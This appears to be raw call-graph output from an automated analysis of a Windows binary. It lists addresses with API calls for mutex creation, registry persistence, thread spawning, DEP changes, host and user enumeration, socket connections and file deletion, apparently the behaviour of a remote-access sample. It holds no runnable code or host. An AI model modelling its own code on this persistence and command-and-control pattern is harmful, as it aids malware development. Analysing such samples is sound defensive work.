46912 40d9aa 46913 40d82d 46912->46913 47230 41a473 46912->47230 46913->46889 46919 40d988 46914->46919 47537 412902 30 API calls 46917->47537 46918 40d9c5 46921 40da18 46918->46921 47247 40697b 46918->47247 46919->46908 47464 412902 30 API calls 46919->47464 46922 401d64 28 API calls 46921->46922 46925 40da21 46922->46925 46934 40da32 46925->46934 46935 40da2d 46925->46935 46927 40e14a 47538 4112b5 64 API calls ___scrt_fastfail 46927->47538 46928 40d9e4 47465 40699d 30 API calls 46928->47465 46929 40d9ee 46933 401d64 28 API calls 46929->46933 46942 40d9f7 46933->46942 46939 401d64 28 API calls 46934->46939 47468 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46935->47468 46936 40d9e9 47466 4064d0 97 API calls 46936->47466 46940 40da3b 46939->46940 47251 41ae18 46940->47251 46942->46921 46944 40da13 46942->46944 46943 40da46 47255 401e18 46943->47255 47467 4064d0 97 API calls 46944->47467 46946 40da51 47259 401e13 46946->47259 46949 40da5a 46950 401d64 28 API calls 46949->46950 46951 40da63 46950->46951 46952 401d64 28 API calls 46951->46952 46953 40da7d 46952->46953 46954 401d64 28 API calls 46953->46954 46955 40da97 46954->46955 46956 401d64 28 API calls 46955->46956 46958 40dab0 46956->46958 46957 40db1d 46960 40db2c 46957->46960 46966 40dcaa ___scrt_fastfail 46957->46966 46958->46957 46959 401d64 28 API calls 46958->46959 46964 40dac5 _wcslen 46959->46964 46961 40db35 46960->46961 46989 40dbb1 ___scrt_fastfail 46960->46989 46962 401d64 28 API calls 46961->46962 46963 40db3e 46962->46963 46965 401d64 28 API calls 46963->46965 46964->46957 46968 401d64 28 API calls 46964->46968 46967 40db50 46965->46967 47528 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46966->47528 46971 401d64 28 API calls 46967->46971 46969 40dae0 46968->46969 46973 401d64 28 API calls 46969->46973 46972 40db62 46971->46972 46976 401d64 28 API calls 46972->46976 46974 40daf5 46973->46974 47469 40c89e 46974->47469 46975 40dcef 46977 401d64 28 API calls 46975->46977 46979 40db8b 46976->46979 46980 40dd16 46977->46980 46985 401d64 28 API calls 46979->46985 47273 401f66 46980->47273 46982 401e18 26 API calls 46984 40db14 46982->46984 46987 401e13 26 API calls 46984->46987 46988 40db9c 46985->46988 46986 40dd25 47277 4126d2 RegCreateKeyA 46986->47277 46987->46957 47526 40bc67 45 API calls _wcslen 46988->47526 47263 4128a2 46989->47263 46993 40dbac 46993->46989 46995 40dc45 ctype 46998 401d64 28 API calls 46995->46998 46996 401d64 28 API calls 46997 40dd47 46996->46997 47283 43a5f7 46997->47283 46999 40dc5c 46998->46999 46999->46975 47002 40dc70 46999->47002 47005 401d64 28 API calls 47002->47005 47003 40dd5e 47529 41bec0 86 API calls ___scrt_fastfail 47003->47529 47004 40dd81 47008 401f66 28 API calls 47004->47008 47006 40dc7e 47005->47006 47009 41ae18 28 API calls 47006->47009 47011 40dd96 47008->47011 47012 40dc87 47009->47012 47010 40dd65 CreateThread 47010->47004 47958 41c97f 10 API calls 47010->47958 47013 401f66 28 API calls 47011->47013 47527 40e219 109 API calls 47012->47527 47015 40dda5 47013->47015 47287 41a696 47015->47287 47016 40dc8c 47016->46975 47018 40dc93 47016->47018 47018->46913 47020 401d64 28 API calls 47021 40ddb6 47020->47021 47022 401d64 28 API calls 47021->47022 47023 40ddcb 47022->47023 47024 401d64 28 API calls 47023->47024 47025 40ddeb 47024->47025 47026 43a5f7 _strftime 42 API calls 47025->47026 47027 40ddf8 47026->47027 47028 401d64 28 API calls 47027->47028 47029 40de03 47028->47029 47030 401d64 28 API calls 47029->47030 47031 40de14 47030->47031 47032 401d64 28 API calls 47031->47032 47033 40de29 47032->47033 47034 401d64 28 API calls 47033->47034 47035 40de3a 47034->47035 47036 40de41 StrToIntA 47035->47036 47311 409517 47036->47311 47039 401d64 28 API calls 47040 40de5c 47039->47040 47041 40dea1 47040->47041 47042 40de68 47040->47042 47045 401d64 28 API calls 47041->47045 47530 43361d 22 API calls 3 library calls 47042->47530 47044 40de71 47046 401d64 28 API calls 47044->47046 47047 40deb1 47045->47047 47048 40de84 47046->47048 47050 40def9 47047->47050 47051 40debd 47047->47051 47049 40de8b CreateThread 47048->47049 47049->47041 47961 419138 102 API calls 2 library calls 47049->47961 47052 401d64 28 API calls 47050->47052 47531 43361d 22 API calls 3 library calls 47051->47531 47054 40df02 47052->47054 47058 40df6c 47054->47058 47059 40df0e 47054->47059 47055 40dec6 47056 401d64 28 API calls 47055->47056 47057 40ded8 47056->47057 47060 40dedf CreateThread 47057->47060 47061 401d64 28 API calls 47058->47061 47062 401d64 28 API calls 47059->47062 47060->47050 47960 419138 102 API calls 2 library calls 47060->47960 47063 40df75 47061->47063 47064 40df1e 47062->47064 47065 40df81 47063->47065 47066 40dfba 47063->47066 47067 401d64 28 API calls 47064->47067 47069 401d64 28 API calls 47065->47069 47336 41a7b2 GetComputerNameExW GetUserNameW 47066->47336 47070 40df33 47067->47070 47072 40df8a 47069->47072 47532 40c854 31 API calls 47070->47532 47076 401d64 28 API calls 47072->47076 47073 401e18 26 API calls 47075 40dfce 47073->47075 47078 401e13 26 API calls 47075->47078 47079 40df9f 47076->47079 47077 40df46 47080 401e18 26 API calls 47077->47080 47081 40dfd7 47078->47081 47090 43a5f7 _strftime 42 API calls 47079->47090 47082 40df52 47080->47082 47083 40dfe0 SetProcessDEPPolicy 47081->47083 47084 40dfe3 CreateThread 47081->47084 47087 401e13 26 API calls 47082->47087 47083->47084 47085 40e004 47084->47085 47086 40dff8 CreateThread 47084->47086 47930 40e54f 47084->47930 47088 40e019 47085->47088 47089 40e00d CreateThread 47085->47089 47086->47085 47962 410f36 136 API calls 47086->47962 47091 40df5b CreateThread 47087->47091 47093 40e073 47088->47093 47095 401f66 28 API calls 47088->47095 47089->47088 47957 411524 38 API calls ___scrt_fastfail 47089->47957 47092 40dfac 47090->47092 47091->47058 47959 40196b 49 API calls _strftime 47091->47959 47533 40b95c 7 API calls 47092->47533 47347 41246e RegOpenKeyExA 47093->47347 47096 40e046 47095->47096 47534 404c9e 28 API calls 47096->47534 47100 40e053 47102 401f66 28 API calls 47100->47102 47101 40e12a 47359 40cbac 47101->47359 47105 40e062 47102->47105 47104 41ae18 28 API calls 47107 40e0a4 47104->47107 47108 41a696 79 API calls 47105->47108 47350 412584 RegOpenKeyExW 47107->47350 47110 40e067 47108->47110 47111 401eea 26 API calls 47110->47111 47111->47093 47114 401e13 26 API calls 47117 40e0c5 47114->47117 47115 40e0ed DeleteFileW 47116 40e0f4 47115->47116 47115->47117 47119 41ae18 28 API calls 47116->47119 47117->47115 47117->47116 47118 40e0db Sleep 47117->47118 47535 401e07 47118->47535 47121 40e104 47119->47121 47355 41297a RegOpenKeyExW 47121->47355 47123 40e117 47124 401e13 26 API calls 47123->47124 47125 40e121 47124->47125 47126 401e13 26 API calls 47125->47126 47126->47101 47127->46813 47128->46818 47129->46817 47130->46827 47131->46829 47132->46832 47133->46807 47134->46810 47135->46814 47136->46836 47137->46838 47138->46840 47139->46843 47141 433c81 GetStartupInfoW 47140->47141 47141->46847 47143 44ddeb 47142->47143 47144 44dde2 47142->47144 47143->46850 47147 44dcd8 51 API calls 3 library calls 47144->47147 47146->46850 47147->47143 47149 41bd32 LoadLibraryA GetProcAddress 47148->47149 47150 41bd22 GetModuleHandleA GetProcAddress 47148->47150 47151 41bd5b 32 API calls 47149->47151 47152 41bd4b LoadLibraryA GetProcAddress 47149->47152 47150->47149 47151->46855 47152->47151 47539 41a64f FindResourceA 47153->47539 47156 43a89c _Yarn 21 API calls 47157 40e192 _Yarn 47156->47157 47542 401f86 47157->47542 47160 401eef 26 API calls 47161 40e1b8 47160->47161 47162 401eea 26 API calls 47161->47162 47163 40e1c1 47162->47163 47164 43a89c _Yarn 21 API calls 47163->47164 47165 40e1d2 _Yarn 47164->47165 47546 406052 47165->47546 47167 40e205 47167->46857 47169 401fcc 47168->47169 47554 402501 47169->47554 47171 401fea 47171->46860 47173 41afe6 47172->47173 47176 41b058 47173->47176 47185 401eef 26 API calls 47173->47185 47188 401eea 26 API calls 47173->47188 47192 41b056 47173->47192 47559 403b60 28 API calls 47173->47559 47560 41bfb9 47173->47560 47174 401eea 26 API calls 47175 41b088 47174->47175 47177 401eea 26 API calls 47175->47177 47567 403b60 28 API calls 47176->47567 47180 41b090 47177->47180 47182 401eea 26 API calls 47180->47182 47181 41b064 47184 401eef 26 API calls 47181->47184 47183 40d7c6 47182->47183 47193 40e8bd 47183->47193 47186 41b06d 47184->47186 47185->47173 47187 401eea 26 API calls 47186->47187 47189 41b075 47187->47189 47188->47173 47190 41bfb9 28 API calls 47189->47190 47190->47192 47192->47174 47194 40e8ca 47193->47194 47196 40e8da 47194->47196 47595 40200a 26 API calls 47194->47595 47196->46865 47198 40200a 47197->47198 47202 40203a 47198->47202 47596 402654 26 API calls 47198->47596 47200 40202b 47597 4026ba 26 API calls _Deallocate 47200->47597 47202->46867 47204 401d6c 47203->47204 47205 401d74 47204->47205 47598 401fff 28 API calls 47204->47598 47205->46873 47209 404ccb 47208->47209 47599 402e78 47209->47599 47211 404cee 47211->46879 47608 404bc4 47212->47608 47214 405cf4 47214->46882 47216 401efe 47215->47216 47217 401f0a 47216->47217 47617 4021b9 26 API calls 47216->47617 47217->46886 47220 4021b9 47219->47220 47221 4021e8 47220->47221 47618 40262e 26 API calls _Deallocate 47220->47618 47221->46888 47225 401ec9 47223->47225 47224 401ee4 47224->46896 47225->47224 47226 402325 28 API calls 47225->47226 47226->47224 47619 401e8f 47227->47619 47229 40bee1 CreateMutexA GetLastError 47229->46912 47621 41b16b 47230->47621 47235 401eef 26 API calls 47236 41a4af 47235->47236 47237 401eea 26 API calls 47236->47237 47238 41a4b7 47237->47238 47239 41a50a 47238->47239 47240 412513 31 API calls 47238->47240 47239->46918 47241 41a4dd 47240->47241 47242 41a4e8 StrToIntA 47241->47242 47243 41a4ff 47242->47243 47244 41a4f6 47242->47244 47246 401eea 26 API calls 47243->47246 47629 41c112 28 API calls 47244->47629 47246->47239 47248 40698f 47247->47248 47249 4124b7 3 API calls 47248->47249 47250 406996 47249->47250 47250->46928 47250->46929 47252 41ae2c 47251->47252 47630 40b027 47252->47630 47254 41ae34 47254->46943 47256 401e27 47255->47256 47258 401e33 47256->47258 47639 402121 26 API calls 47256->47639 47258->46946 47261 402121 47259->47261 47260 402150 47260->46949 47261->47260 47640 402718 26 API calls _Deallocate 47261->47640 47264 4128c0 47263->47264 47265 406052 28 API calls 47264->47265 47266 4128d5 47265->47266 47267 401fbd 28 API calls 47266->47267 47268 4128e5 47267->47268 47269 4126d2 29 API calls 47268->47269 47270 4128ef 47269->47270 47271 401eea 26 API calls 47270->47271 47272 4128fc 47271->47272 47272->46995 47274 401f6e 47273->47274 47641 402301 47274->47641 47278 412722 47277->47278 47280 4126eb 47277->47280 47279 401eea 26 API calls 47278->47279 47281 40dd3b 47279->47281 47282 4126fd RegSetValueExA RegCloseKey 47280->47282 47281->46996 47282->47278 47284 43a610 _strftime 47283->47284 47645 43994e 47284->47645 47288 41a747 47287->47288 47289 41a6ac GetLocalTime 47287->47289 47291 401eea 26 API calls 47288->47291 47290 404cbf 28 API calls 47289->47290 47292 41a6ee 47290->47292 47293 41a74f 47291->47293 47294 405ce6 28 API calls 47292->47294 47295 401eea 26 API calls 47293->47295 47296 41a6fa 47294->47296 47297 40ddaa 47295->47297 47679 4027cb 47296->47679 47297->47020 47299 41a706 47300 405ce6 28 API calls 47299->47300 47301 41a712 47300->47301 47682 406478 76 API calls 47301->47682 47303 41a720 47304 401eea 26 API calls 47303->47304 47305 41a72c 47304->47305 47306 401eea 26 API calls 47305->47306 47307 41a735 47306->47307 47308 401eea 26 API calls 47307->47308 47309 41a73e 47308->47309 47310 401eea 26 API calls 47309->47310 47310->47288 47312 409536 _wcslen 47311->47312 47313 409541 47312->47313 47314 409558 47312->47314 47315 40c89e 31 API calls 47313->47315 47316 40c89e 31 API calls 47314->47316 47317 409549 47315->47317 47318 409560 47316->47318 47319 401e18 26 API calls 47317->47319 47320 401e18 26 API calls 47318->47320 47321 409553 47319->47321 47322 40956e 47320->47322 47324 401e13 26 API calls 47321->47324 47323 401e13 26 API calls 47322->47323 47325 409576 47323->47325 47326 4095ad 47324->47326 47702 40856b 28 API calls 47325->47702 47687 409837 47326->47687 47329 409588 47703 4028cf 47329->47703 47332 409593 47333 401e18 26 API calls 47332->47333 47334 40959d 47333->47334 47335 401e13 26 API calls 47334->47335 47335->47321 47722 403b40 47336->47722 47340 41a80d 47341 4028cf 28 API calls 47340->47341 47342 41a817 47341->47342 47343 401e13 26 API calls 47342->47343 47344 41a820 47343->47344 47345 401e13 26 API calls 47344->47345 47346 40dfc3 47345->47346 47346->47073 47348 40e08b 47347->47348 47349 41248f RegQueryValueExA RegCloseKey 47347->47349 47348->47101 47348->47104 47349->47348 47351 4125b0 RegQueryValueExW RegCloseKey 47350->47351 47352 4125dd 47350->47352 47351->47352 47353 403b40 28 API calls 47352->47353 47354 40e0ba 47353->47354 47354->47114 47356 412992 RegDeleteValueW 47355->47356 47357 4129a6 47355->47357 47356->47357 47358 4129a2 47356->47358 47357->47123 47358->47123 47360 40cbc5 47359->47360 47361 41246e 3 API calls 47360->47361 47362 40cbcc 47361->47362 47366 40cbeb 47362->47366 47755 401602 47362->47755 47364 40cbd9 47758 4127d5 RegCreateKeyA 47364->47758 47367 413fd4 47366->47367 47368 413feb 47367->47368 47775 41aa83 47368->47775 47370 413ff6 47371 401d64 28 API calls 47370->47371 47372 41400f 47371->47372 47373 43a5f7 _strftime 42 API calls 47372->47373 47374 41401c 47373->47374 47375 414021 Sleep 47374->47375 47376 41402e 47374->47376 47375->47376 47377 401f66 28 API calls 47376->47377 47378 41403d 47377->47378 47379 401d64 28 API calls 47378->47379 47380 41404b 47379->47380 47381 401fbd 28 API calls 47380->47381 47382 414053 47381->47382 47383 41afd3 28 API calls 47382->47383 47384 41405b 47383->47384 47779 404262 WSAStartup 47384->47779 47386 414065 47387 401d64 28 API calls 47386->47387 47388 41406e 47387->47388 47389 401d64 28 API calls 47388->47389 47415 4140ed 47388->47415 47390 414087 47389->47390 47391 401d64 28 API calls 47390->47391 47392 414098 47391->47392 47394 401d64 28 API calls 47392->47394 47393 41afd3 28 API calls 47393->47415 47395 4140a9 47394->47395 47397 401d64 28 API calls 47395->47397 47396 4085b4 28 API calls 47396->47415 47398 4140ba 47397->47398 47401 401d64 28 API calls 47398->47401 47399 4027cb 28 API calls 47399->47415 47400 401eef 26 API calls 47400->47415 47402 4140cb 47401->47402 47403 401d64 28 API calls 47402->47403 47404 4140dd 47403->47404 47882 404101 87 API calls 47404->47882 47406 405ce6 28 API calls 47406->47415 47407 401d64 28 API calls 47407->47415 47409 414244 WSAGetLastError 47883 41bc86 30 API calls 47409->47883 47414 401f66 28 API calls 47414->47415 47415->47393 47415->47396 47415->47399 47415->47400 47415->47406 47415->47407 47415->47409 47415->47414 47418 401eea 26 API calls 47415->47418 47419 404cbf 28 API calls 47415->47419 47420 401d8c 26 API calls 47415->47420 47421 43a5f7 _strftime 42 API calls 47415->47421 47423 41a696 79 API calls 47415->47423 47427 401fbd 28 API calls 47415->47427 47429 412513 31 API calls 47415->47429 47433 41446f 47415->47433 47780 413f9a 47415->47780 47786 4041f1 47415->47786 47793 404915 47415->47793 47808 40428c connect 47415->47808 47868 4047eb WaitForSingleObject 47415->47868 47884 404c9e 28 API calls 47415->47884 47885 413683 50 API calls 47415->47885 47886 4082dc 28 API calls 47415->47886 47887 440c61 26 API calls 47415->47887 47888 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 47415->47888 47418->47415 47419->47415 47420->47415 47422 414b80 Sleep 47421->47422 47422->47415 47423->47415 47427->47415 47429->47415 47430 403b40 28 API calls 47430->47433 47433->47415 47433->47430 47434 41ad56 28 API calls 47433->47434 47435 401d64 28 API calls 47433->47435 47440 41aed8 28 API calls 47433->47440 47443 405ce6 28 API calls 47433->47443 47444 4027cb 28 API calls 47433->47444 47445 40275c 28 API calls 47433->47445 47447 401eea 26 API calls 47433->47447 47450 401f66 28 API calls 47433->47450 47451 41a696 79 API calls 47433->47451 47452 414b22 CreateThread 47433->47452 47453 401e13 26 API calls 47433->47453 47889 40cbf1 6 API calls 47433->47889 47890 41adfe 28 API calls 47433->47890 47892 41acb0 GetTickCount 47433->47892 47893 41ac62 30 API calls ___scrt_fastfail 47433->47893 47894 40e679 29 API calls 47433->47894 47895 4027ec 28 API calls 47433->47895 47896 404468 59 API calls _Yarn 47433->47896 47897 4045d5 111 API calls _Yarn 47433->47897 47898 40a767 84 API calls 47433->47898 47434->47433 47436 4144ed GetTickCount 47435->47436 47891 41ad56 28 API calls 47436->47891 47440->47433 47443->47433 47444->47433 47445->47433 47447->47433 47450->47433 47451->47433 47452->47433 47923 419e99 102 API calls 47452->47923 47453->47433 47454->46872 47455->46883 47458 4085c0 47457->47458 47459 402e78 28 API calls 47458->47459 47460 4085e4 47459->47460 47460->46904 47462 4124e1 RegQueryValueExA RegCloseKey 47461->47462 47463 41250b 47461->47463 47462->47463 47463->46900 47464->46908 47465->46936 47466->46929 47467->46921 47468->46934 47470 40c8ba 47469->47470 47471 40c8da 47470->47471 47472 40c90f 47470->47472 47474 40c8d0 47470->47474 47924 41a75b 29 API calls 47471->47924 47473 41b16b GetCurrentProcess 47472->47473 47477 40c914 47473->47477 47476 40ca03 GetLongPathNameW 47474->47476 47479 403b40 28 API calls 47476->47479 47481 40c918 47477->47481 47482 40c96a 47477->47482 47478 40c8e3 47483 401e18 26 API calls 47478->47483 47480 40ca18 47479->47480 47484 403b40 28 API calls 47480->47484 47486 403b40 28 API calls 47481->47486 47485 403b40 28 API calls 47482->47485 47487 40c8ed 47483->47487 47488 40ca27 47484->47488 47489 40c978 47485->47489 47490 40c926 47486->47490 47492 401e13 26 API calls 47487->47492 47927 40cc37 28 API calls 47488->47927 47495 403b40 28 API calls 47489->47495 47496 403b40 28 API calls 47490->47496 47492->47474 47493 40ca3a 47928 402860 28 API calls 47493->47928 47498 40c98e 47495->47498 47499 40c93c 47496->47499 47497 40ca45 47929 402860 28 API calls 47497->47929 47926 402860 28 API calls 47498->47926 47925 402860 28 API calls 47499->47925 47503 40ca4f 47506 401e13 26 API calls 47503->47506 47504 40c999 47507 401e18 26 API calls 47504->47507 47505 40c947 47508 401e18 26 API calls 47505->47508 47509 40ca59 47506->47509 47510 40c9a4 47507->47510 47511 40c952 47508->47511 47512 401e13 26 API calls 47509->47512 47513 401e13 26 API calls 47510->47513 47514 401e13 26 API calls 47511->47514 47515 40ca62 47512->47515 47516 40c9ad 47513->47516 47517 40c95b 47514->47517 47519 401e13 26 API calls 47515->47519 47520 401e13 26 API calls 47516->47520 47518 401e13 26 API calls 47517->47518 47518->47487 47521 40ca6b 47519->47521 47520->47487 47522 401e13 26 API calls 47521->47522 47523 40ca74 47522->47523 47524 401e13 26 API calls 47523->47524 47525 40ca7d 47524->47525 47525->46982 47526->46993 47527->47016 47528->46975 47529->47010 47530->47044 47531->47055 47532->47077 47533->47066 47534->47100 47536 401e0c 47535->47536 47537->46927 47540 40e183 47539->47540 47541 41a66c LoadResource LockResource SizeofResource 47539->47541 47540->47156 47541->47540 47543 401f8e 47542->47543 47549 402325 47543->47549 47545 401fa4 47545->47160 47547 401f86 28 API calls 47546->47547 47548 406066 47547->47548 47548->47167 47550 40232f 47549->47550 47552 40233a 47550->47552 47553 40294a 28 API calls 47550->47553 47552->47545 47553->47552 47555 40250d 47554->47555 47557 40252b 47555->47557 47558 40261a 28 API calls 47555->47558 47557->47171 47558->47557 47559->47173 47561 41bfbe 47560->47561 47562 41bfe2 47561->47562 47563 41bfdb 47561->47563 47568 41c562 47562->47568 47587 41bff3 28 API calls 47563->47587 47565 41bfe0 47565->47173 47567->47181 47569 41c56c __EH_prolog 47568->47569 47570 41c683 47569->47570 47571 41c5a5 47569->47571 47594 402649 28 API calls std::_Xinvalid_argument 47570->47594 47588 4026a7 28 API calls 47571->47588 47575 41c5b9 47589 41c546 28 API calls 47575->47589 47577 41c5ec 47578 41c613 47577->47578 47579 41c607 47577->47579 47591 41c7df 26 API calls 47578->47591 47590 41c7c2 26 API calls 47579->47590 47582 41c61f 47592 41c7df 26 API calls 47582->47592 47583 41c611 47593 41c76a 26 API calls 47583->47593 47586 41c64e 47586->47565 47587->47565 47588->47575 47589->47577 47590->47583 47591->47582 47592->47583 47593->47586 47595->47196 47596->47200 47597->47202 47600 402e85 47599->47600 47601 402e98 47600->47601 47603 402ea9 47600->47603 47604 402eae 47600->47604 47606 403445 28 API calls 47601->47606 47603->47211 47604->47603 47607 40225b 26 API calls 47604->47607 47606->47603 47607->47603 47609 404bd0 47608->47609 47612 40245c 47609->47612 47611 404be4 47611->47214 47613 402469 47612->47613 47615 402478 47613->47615 47616 402ad3 28 API calls 47613->47616 47615->47611 47616->47615 47617->47217 47618->47221 47620 401e94 47619->47620 47622 41a481 47621->47622 47623 41b178 GetCurrentProcess 47621->47623 47624 412513 RegOpenKeyExA 47622->47624 47623->47622 47625 412541 RegQueryValueExA RegCloseKey 47624->47625 47626 412569 47624->47626 47625->47626 47627 401f66 28 API calls 47626->47627 47628 41257e 47627->47628 47628->47235 47629->47243 47631 40b02f 47630->47631 47634 40b04b 47631->47634 47633 40b045 47633->47254 47635 40b055 47634->47635 47637 40b060 47635->47637 47638 40b138 28 API calls 47635->47638 47637->47633 47638->47637 47639->47258 47640->47260 47642 40230d 47641->47642 47643 402325 28 API calls 47642->47643 47644 401f80 47643->47644 47644->46986 47663 43a555 47645->47663 47647 43999b 47672 4392ee 38 API calls 3 library calls 47647->47672 47649 439960 47649->47647 47650 439975 47649->47650 47662 40dd54 47649->47662 47670 445364 20 API calls _abort 47650->47670 47652 43997a 47671 43a837 26 API calls _Deallocate 47652->47671 47655 4399a7 47656 4399d6 47655->47656 47673 43a59a 42 API calls __Tolower 47655->47673 47658 439a42 47656->47658 47674 43a501 26 API calls 2 library calls 47656->47674 47675 43a501 26 API calls 2 library calls 47658->47675 47660 439b09 _strftime 47660->47662 47676 445364 20 API calls _abort 47660->47676 47662->47003 47662->47004 47664 43a55a 47663->47664 47665 43a56d 47663->47665 47677 445364 20 API calls _abort 47664->47677 47665->47649 47667 43a55f 47678 43a837 26 API calls _Deallocate 47667->47678 47669 43a56a 47669->47649 47670->47652 47671->47662 47672->47655 47673->47655 47674->47658 47675->47660 47676->47662 47677->47667 47678->47669 47683 401e9b 47679->47683 47681 4027d9 47681->47299 47682->47303 47684 401ea7 47683->47684 47685 40245c 28 API calls 47684->47685 47686 401eb9 47685->47686 47686->47681 47688 409855 47687->47688 47689 4124b7 3 API calls 47688->47689 47690 40985c 47689->47690 47691 409870 47690->47691 47692 40988a 47690->47692 47694 4095cf 47691->47694 47695 409875 47691->47695 47708 4082dc 28 API calls 47692->47708 47694->47039 47706 4082dc 28 API calls 47695->47706 47696 409898 47709 4098a5 85 API calls 47696->47709 47699 409883 47707 409959 29 API calls 47699->47707 47701 409888 47701->47694 47702->47329 47713 402d8b 47703->47713 47705 4028dd 47705->47332 47706->47699 47707->47701 47710 40999f 129 API calls 47707->47710 47708->47696 47709->47694 47711 4099b5 52 API calls 47709->47711 47712 4099a9 124 API calls 47709->47712 47714 402d97 47713->47714 47717 4030f7 47714->47717 47716 402dab 47716->47705 47718 403101 47717->47718 47720 403115 47718->47720 47721 4036c2 28 API calls 47718->47721 47720->47716 47721->47720 47723 403b48 47722->47723 47729 403b7a 47723->47729 47726 403cbb 47738 403dc2 47726->47738 47728 403cc9 47728->47340 47730 403b86 47729->47730 47733 403b9e 47730->47733 47732 403b5a 47732->47726 47734 403ba8 47733->47734 47736 403bb3 47734->47736 47737 403cfd 28 API calls 47734->47737 47736->47732 47737->47736 47739 403dce 47738->47739 47742 402ffd 47739->47742 47741 403de3 47741->47728 47743 40300e 47742->47743 47748 4032a4 47743->47748 47747 40302e 47747->47741 47749 4032b0 47748->47749 47750 40301a 47748->47750 47754 4032b6 28 API calls 47749->47754 47750->47747 47753 4035e8 28 API calls 47750->47753 47753->47747 47761 4395ca 47755->47761 47759 412814 47758->47759 47760 4127ed RegSetValueExA RegCloseKey 47758->47760 47759->47366 47760->47759 47764 43954b 47761->47764 47763 401608 47763->47364 47765 43955a 47764->47765 47766 43956e 47764->47766 47772 445364 20 API calls _abort 47765->47772 47771 43956a __alldvrm 47766->47771 47774 447611 11 API calls 2 library calls 47766->47774 47768 43955f 47773 43a837 26 API calls _Deallocate 47768->47773 47771->47763 47772->47768 47773->47771 47774->47771 47778 41aac9 _Yarn ___scrt_fastfail 47775->47778 47776 401f66 28 API calls 47777 41ab3e 47776->47777 47777->47370 47778->47776 47779->47386 47781 413fb3 WSASetLastError 47780->47781 47782 413fa9 47780->47782 47781->47415 47899 413e37 35 API calls ___std_exception_copy 47782->47899 47785 413fae 47785->47781 47787 404206 socket 47786->47787 47788 4041fd 47786->47788 47790 404220 47787->47790 47791 404224 CreateEventW 47787->47791 47900 404262 WSAStartup 47788->47900 47790->47415 47791->47415 47792 404202 47792->47787 47792->47790 47794 40492a 47793->47794 47795 4049b1 47793->47795 47796 404933 47794->47796 47797 404987 CreateEventA CreateThread 47794->47797 47798 404942 GetLocalTime 47794->47798 47795->47415 47796->47797 47797->47795 47903 404b1d 47797->47903 47901 41ad56 28 API calls 47798->47901 47800 40495b 47902 404c9e 28 API calls 47800->47902 47802 404968 47803 401f66 28 API calls 47802->47803 47804 404977 47803->47804 47805 41a696 79 API calls 47804->47805 47806 40497c 47805->47806 47807 401eea 26 API calls 47806->47807 47807->47797 47809 4043e1 47808->47809 47810 4042b3 47808->47810 47811 404343 47809->47811 47812 4043e7 WSAGetLastError 47809->47812 47810->47811 47814 404cbf 28 API calls 47810->47814 47834 4042e8 47810->47834 47811->47415 47812->47811 47813 4043f7 47812->47813 47815 4043fc 47813->47815 47824 4042f7 47813->47824 47817 4042d4 47814->47817 47918 41bc86 30 API calls 47815->47918 47821 401f66 28 API calls 47817->47821 47819 4042f0 47823 404306 47819->47823 47819->47824 47820 401f66 28 API calls 47825 404448 47820->47825 47826 4042e3 47821->47826 47822 40440b 47919 404c9e 28 API calls 47822->47919 47831 404315 47823->47831 47832 40434c 47823->47832 47824->47820 47828 401f66 28 API calls 47825->47828 47829 41a696 79 API calls 47826->47829 47833 404457 47828->47833 47829->47834 47830 404418 47835 401f66 28 API calls 47830->47835 47836 401f66 28 API calls 47831->47836 47915 420f44 55 API calls 47832->47915 47837 41a696 79 API calls 47833->47837 47907 420161 27 API calls 47834->47907 47839 404427 47835->47839 47840 404324 47836->47840 47837->47811 47842 41a696 79 API calls 47839->47842 47843 401f66 28 API calls 47840->47843 47841 404354 47844 404389 47841->47844 47845 404359 47841->47845 47846 40442c 47842->47846 47847 404333 47843->47847 47917 4202fa 28 API calls 47844->47917 47849 401f66 28 API calls 47845->47849 47850 401eea 26 API calls 47846->47850 47851 41a696 79 API calls 47847->47851 47853 404368 47849->47853 47850->47811 47855 404338 47851->47855 47852 404391 47856 4043be CreateEventW CreateEventW 47852->47856 47858 401f66 28 API calls 47852->47858 47854 401f66 28 API calls 47853->47854 47857 404377 47854->47857 47908 4201a1 47855->47908 47856->47811 47859 41a696 79 API calls 47857->47859 47861 4043a7 47858->47861 47862 40437c 47859->47862 47863 401f66 28 API calls 47861->47863 47916 4205a2 53 API calls 47862->47916 47865 4043b6 47863->47865 47866 41a696 79 API calls 47865->47866 47867 4043bb 47866->47867 47867->47856 47869 404805 SetEvent CloseHandle 47868->47869 47870 40481c closesocket 47868->47870 47871 40489c 47869->47871 47872 404829 47870->47872 47871->47415 47873 404838 47872->47873 47874 40483f 47872->47874 47922 404ab1 83 API calls 47873->47922 47876 404851 WaitForSingleObject 47874->47876 47877 404892 SetEvent CloseHandle 47874->47877 47878 4201a1 3 API calls 47876->47878 47877->47871 47879 404860 SetEvent WaitForSingleObject 47878->47879 47880 4201a1 3 API calls 47879->47880 47881 404878 SetEvent CloseHandle CloseHandle 47880->47881 47881->47877 47882->47415 47883->47415 47884->47415 47885->47415 47886->47415 47887->47415 47888->47415 47889->47433 47890->47433 47891->47433 47892->47433 47893->47433 47894->47433 47895->47433 47896->47433 47897->47433 47898->47433 47899->47785 47900->47792 47901->47800 47902->47802 47906 404b29 101 API calls 47903->47906 47905 404b26 47906->47905 47907->47819 47909 41dc25 47908->47909 47910 4201a9 47908->47910 47911 41dc33 47909->47911 47920 41cd79 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47909->47920 47910->47811 47921 41d960 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47911->47921 47914 41dc3a 47915->47841 47916->47855 47917->47852 47918->47822 47919->47830 47920->47911 47921->47914 47922->47874 47924->47478 47925->47505 47926->47504 47927->47493 47928->47497 47929->47503 47932 40e56a 47930->47932 47931 4124b7 3 API calls 47931->47932 47932->47931 47933 40e60e 47932->47933 47935 40e5fe Sleep 47932->47935 47940 40e59c 47932->47940 47966 4082dc 28 API calls 47933->47966 47935->47932 47938 41ae18 28 API calls 47938->47940 47939 40e619 47941 41ae18 28 API calls 47939->47941 47940->47935 47940->47938 47945 401e13 26 API calls 47940->47945 47949 401f66 28 API calls 47940->47949 47952 4126d2 29 API calls 47940->47952 47963 40bf04 73 API calls ___scrt_fastfail 47940->47963 47964 4082dc 28 API calls 47940->47964 47965 412774 29 API calls 47940->47965 47943 40e625 47941->47943 47967 412774 29 API calls 47943->47967 47945->47940 47946 40e638 47947 401e13 26 API calls 47946->47947 47948 40e644 47947->47948 47950 401f66 28 API calls 47948->47950 47949->47940 47951 40e655 47950->47951 47953 